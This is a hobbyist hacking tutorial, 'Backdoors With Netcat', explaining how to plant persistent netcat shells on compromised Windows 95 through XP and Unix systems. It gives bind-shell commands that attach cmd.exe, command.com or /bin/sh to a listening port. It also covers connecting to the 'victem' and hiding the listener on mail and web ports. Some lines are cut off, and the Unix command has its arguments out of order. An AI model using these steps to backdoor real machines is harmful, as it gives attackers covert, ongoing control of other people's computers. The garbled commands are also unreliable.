GUIDE to (mostly) Harmless
Hacking: "Backdoors With Netcat"
This guide covers Windows XP, 2000, NT, ME,
98, 95 and our favorite: Unix/Linux!
by Steven Welch
with additions from
Netcat, a networking security tool from the l0pht, can be used
set up backdoors (ways of returning from a compromised system).
The netcat backdoor discussed in this GTMHH is one based on Windows
NT that is also in a GTMHH written by keydet
in the MS Only Series. Thank you keydet!
Before I discuss the backdoor, let me tell you a few lines about
1) I'm not in any way close to being an Uberhacker. The thought
of me being one just doesn't go with humanity for I've only been
hacking for about a year.
2) I'm still in school, so don't expect me to always be able
to return your e-mails.
3) DON'T SEE ME AS A ROLE MODEL! IN NO WAY IS MY LIFE ANYWHERE
CLOSE TO PERFECT!
Table of Contents:
1. The Problem
2. How the Backdoor Works
3. Getting the Backdoor to Work on Windows 95/98/ME
1. The Problem
Here's what this whole guide is about: getting the backdoor to
work on more than just Windows NT/2000/XP.When I first saw the
guide on breaking into NT, I hurried up and viewed it. I began
reading and it said something like, "This also works with
2000 and XP!" I thought to myself, "Now that's not right!
Windows 95/98/ME and Unix!" So I began reading on on how
the backdoor worked and saw how it worked in order to set off
toward my goal of a multi-operating-system backdoor.
2. How the Backdoor Works - On Windows NT/2000/XP
For the backdoor, you'll need netcat for Windows (means you'll
need a windows box, too) which you can get from @stake).
Look for the network tools - that's where you'll find netcat.
You should also know how to make batch files, which you can learn
in the MS Only Series from keydet in the
Know everything else there is to know in all of the GTMHH!
First, get the netcat executable file (nc.exe) onto the target's
c:\windows\system32 directory. Then make a batch file with the
following command in it:
nc -L -d -p <backdoor port of choice> -t -e cmd.exe
Here's what that command does:
nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-d Tells netcat not to open a Window when running
-p Specifies a port to listen for a connection on
-t Tells netcat to accept telnet connections
-e Tells what program to run once the port is connected to
Put the batch file in the c:\windows\system32 directory also
and run it.
Once that batch file is run, you can telnet or use netcat in
client mode to connect to it. Here's how to use netcat to connect
In a DOS prompt, give the command
C:\WINDOWS\> nc -v <IP Address of victem> <port you
Once you connected to that port on the victem's computer, you'll
have a DOS prompt that you can give any command on the victem's
The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.
3. Getting the Backdoor to Work on
After reading, I thought to myself, "Now why can't I get
work on 95/98/ME? Hmm... let's see here..." Then I thought
about how the commands worked and came up with a solution.
First, put the nc.exe file in the c:\windows directory. Why?
Explain later. Put the batch file there, too, but change the batch
nc -L -d -p <port of choice> -t -e command.com
There ya go - it'll work on 95/98/ME. Here's why:
First off, you don't need to put the files in the system32 directory
because 95/98/ME doesn't use execute paths like NT does. If you
wouldn't have put the files in System32 directory on NT, the program
wouldn't have executed the batch file because it wouldn't have
been in the file path - but you don't have to worry about that
in 95/98/ME. The reason why we put the files in the c:\windows
directory on 95/98/Me is because that's where the command.com
file is - the MS-DOS Prompt file. (It's cmd.exe on NT/2000/XP.)
That's why we ran command.com instead of cmd.exe.
4. Getting the Backdoor to Work on Unix/Linux
Ok, first off, get the unix version of netcat onto the target
system. Now, simply execute the following command on the following
nc -nvv -l -p -e /bin/sh <port of choice>
For best results, put that command in a shell script. Also, a
good idea is to run the command on more than one port to connect
to, and to execute this command to ports like mail services (port
25) and web services (port 80).
How does this work? Let's examine:
-nvv I'm not exactly sure what this does. Further research is
-l stay open and listen
-p what port to listen to
-e /bin/sh spawns a shell. Or could use bash, tcsh, ksh etc. instead
of sh for the shell of your choice.
So, let's see what we've learned overall:
Netcat is a usefull hackers tool that can set up backdoors. That
says it all.
Thanks for reading!
Steven Lee Welch
With additions from
Search the GTMHH
Why do we freely give out information that even the total beginner
may use as a two-edged sword of cyberspace power? We do this
"to turn over to mankind at large
the greatest possible power to control the world
and deal with it according to its lights and values." --
Robert J. Oppenheimer, head of the Manhattan Project, which created
the world's first nuclear weapons.